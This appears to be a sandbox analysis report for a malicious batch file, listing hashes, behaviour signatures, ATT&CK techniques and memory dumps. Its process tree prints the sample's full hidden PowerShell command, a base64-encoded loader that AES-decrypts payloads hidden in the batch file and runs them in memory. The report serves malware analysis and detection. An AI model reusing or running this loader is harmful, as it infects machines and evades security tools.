02a9d861a3ca7c4b9096e16d74fad94c6b577b954e800f4b23625d133add5c6f

General

Target

02a9d861a3ca7c4b9096e16d74fad94c6b577b954e800f4b23625d133add5c6f.bat
Size

66KB
MD5

884179d856f1870b50ee3b0ca606ca8a
SHA1

12f60d3393ac5e5c93637c168cc678b05aec183a
SHA256

02a9d861a3ca7c4b9096e16d74fad94c6b577b954e800f4b23625d133add5c6f
SHA512

ccac70be4a34a296010541496ada60763fcc460140956fb44d4051c84b2225109bb8fa68ee3d0ea4755d33ad39cba179883560bb7eae95b351dbc5204f39c50f
SSDEEP

1536:IjfS0G9/uMZf+dCwNsHbsFfKi2lkH0ZkbmEKUgXEXzICKUnFhGg:f9/uzdCwNs7wZ2GHZHfTGg

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2192	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2192	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2192	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2772 wrote to memory of 2916	2772	cmd.exe	32
PID 2772 wrote to memory of 2916	2772	cmd.exe	32
PID 2772 wrote to memory of 2916	2772	cmd.exe	32
PID 2916 wrote to memory of 2192	2916	cmd.exe	34
PID 2916 wrote to memory of 2192	2916	cmd.exe	34
PID 2916 wrote to memory of 2192	2916	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\02a9d861a3ca7c4b9096e16d74fad94c6b577b954e800f4b23625d133add5c6f.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\02a9d861a3ca7c4b9096e16d74fad94c6b577b954e800f4b23625d133add5c6f.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZWNyZ3YgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGVjcmd2KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRlY3JndiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRlY3JndiwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZWNyZ3YiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZHB3cWwoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2ZQOWQvNmdTTXVzdU1RdXg2U2l0bXFhZ0w1TXNkWFhsbGdHL1NxTEhRaTg9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0tTUUN4cnhWN2E3QStBNGVueWR4YlE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gZnJpaWMoJHBhcmFtX3Zhcil7CSR4YXBvaD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkcWdraGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkka2JqZmM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkeGFwb2gsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJGtiamZjLkNvcHlUbygkcWdraGIpOwkka2JqZmMuRGlzcG9zZSgpOwkkeGFwb2guRGlzcG9zZSgpOwkkcWdraGIuRGlzcG9zZSgpOwkkcWdraGIuVG9BcnJheSgpO31mdW5jdGlvbiBlYXdnaigkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJG9zZ2pnPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGJoa2hlPSRvc2dqZy5FbnRyeVBvaW50OwkkYmhraGUuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGVjcmd2OyRlbmRtaD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGVjcmd2KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkdmlsIGluICRlbmRtaCkgewlpZiAoJHZpbC5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGhpZmltPSR2aWwuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHd3d2J6PVtzdHJpbmdbXV0kaGlmaW0uU3BsaXQoJ1wnKTskdXRieGQ9ZnJpaWMgKGRwd3FsIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHd3d2J6WzBdKSkpOyRkdXVveT1mcmlpYyAoZHB3cWwgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkd3d3YnpbMV0pKSk7ZWF3Z2ogJHV0YnhkICRudWxsO2Vhd2dqICRkdXVveSAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2192-6-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp

Filesize
4KB

Download
memory/2192-7-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/2192-8-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2192-9-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-10-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-11-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-13-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-12-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-14-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing